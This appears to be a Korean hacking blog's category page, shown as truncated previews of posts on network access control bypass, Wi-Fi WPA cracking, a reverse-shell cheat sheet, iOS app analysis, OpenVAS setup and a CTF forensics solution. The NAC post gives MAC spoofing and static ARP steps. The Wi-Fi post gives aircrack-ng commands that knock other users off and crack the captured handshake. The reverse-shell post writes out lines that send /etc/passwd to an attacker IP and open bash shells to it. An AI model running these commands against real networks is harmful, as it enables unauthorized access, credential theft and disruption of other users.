Hack/No filtered
-
[NAC] Network Access Control 우회 (MAC 탈취 / MAC 고정 )Hack/No filtered 2021. 1. 12. 09:52
[Windows 환경] 1) 정상 사용자의 MAC 탈취 시나리오 1. 와이어샤크를 이용하여 패킷 수집 후 정상 사용자의 MAC 획득 2. TMAC 프로그램을 이용하여 정상 사용자의 MAC으로 변조 3. 네트워크 정상 사용 2) 게이트웨이 IP에 대한 ARP 테이블 정적 등록을 이용한 우회 시나리오 0. 와이어샤크를 이용하여 패킷 수집 후 게이트웨이의 IP 및 MAC 주소 획득 1. 관리자권한으로 cmd 실행 2. arp 테이블 지우기 netsh interface ip delete neighbors 3. 적용할 네트워크 인터페이스 확인 netsh interface show interface 4. arp 테이블 정적 추가 netsh interface ip add neighbors "인터페이스 이름" "게이트..
-
Kali linux를 이용한 AP 해킹 (+windows)Hack/No filtered 2021. 1. 12. 09:42
iwconfig ifconfig wlan0 down [모니터 모드 전환] airmon-ng check kill : 모드 전환 시 간섭 발생 가능성이 있는 프로세스 종료 airmon-ng start wlan0 iwconfig [주변 무선랜 스캔] airodump-ng wlan0mon [타겟 설정] airodump-ng wlan0mon --channel 3 --bssid [bssid] -w [filename] [강제로 다른 사용자 연결 해제] aireplay-ng 0 [인증 해제 횟수] -a [AP의 MAC주소] -c [접속한 장비의 MAC주소] [사전 대입, wpa wpa2] aircrack-ng wpacrack-01.cap -w /usr/share/wordlists/sqlmap.txt [hashcat 사..
-
reverse shell summaryHack/No filtered 2020. 4. 8. 10:19
1. bash의 /dev/tcp 사용하기 쉘의 기본커맨드창에서 /dev/tcp를 이용하면 리버스쉘을 사용할 수 있다. 예로, cat /etc/passwd > /dev/tcp/공격자의 IP/PORT 이렇게하면 공격자의 IP/PORT로 /etc/passwd의 내용을 전달해준다. 응용하면 공격자에게 쉘까지 열어줄 수 있다. Cheat Sheet : /bin/sh >& /dev/tcp/Attacker_IP/PORT 0>&1 Cheat Sheet : bash -i >& /dev/tcp/Attacker_IP/PORT 0>&1 1: bash -i 2: >& /dev/tcp/Attacker_IP/PORT 3: 0>&1 bash -i는 bash shell을 대화형(interactive)모드로 사용하는 옵션이다. >& /..
-
ios 정적 분석 방법Hack/No filtered 2020. 4. 6. 10:47
1) 앱 설치 경로 파악 find / -name appname 2) 앱 복호화 clutch -d appname or number -> ipa 파일형태로 복호화됨 (그대로 ida에서 리버싱 가능) 3) ipa 파일 압축해제 unzip -d 압축풀경로 appname.ipa 4) 클래스정보 덤프 class-dump-z appname 5) objective-c 코드를 분석 진행 기타) 기본 명령어 otool (암호화된 앱인지 확인할 수 있음) .db 파일 검색 : find / -name *.db sqlite로 db 열어보기 : sqlite3 name.db -> .headers on -> .tables -> select * from table; plist 파일 xml로 변환 : plutil -convert xml..
-
openvas 설치 및 사용법Hack/No filtered 2020. 4. 6. 10:36
apt-get update && apt-get dist-upgrade -y reboot apt-get install openvas openvas-setup openvas-check-setup openvas-start openvasmd --user=admin --new-password= https://127.0.0.1:9392 advanced, confirm security exception 참고 : https://m.blog.naver.com/koromoon/221119393938
-
2016 HDCON 사고분석 1-1 문제Hack/No filtered 2020. 4. 6. 09:20
문제 : 손상된 압축파일을 복구해서 압축파일의 MD5를 찾아라 1) 손상된 파일 2) 복구 완료된 파일 3) 압축파일 내 포함된 python 스크립트 (사고분석용 스크립트로 확인됨) 문제풀이 1. recme.zip 파일 내에 파일 시그니처 확인 불가 2. zip 파일 포맷의 특성을 파악해보니 Central Directory의 Header와 Local Header의 숫자가 같아야 하는데 Local Header가 누락되어 일어나는 현상으로 추측 3. Central Header의 시작위치와 Central Header Offset 값의 차이가 0x28 만큼 차이남을 확인하였으며 이는 Local Header 중 파일명을 포함한 사이즈와 동일함을 확인함 4. Central Header를 참고하여 Local Head..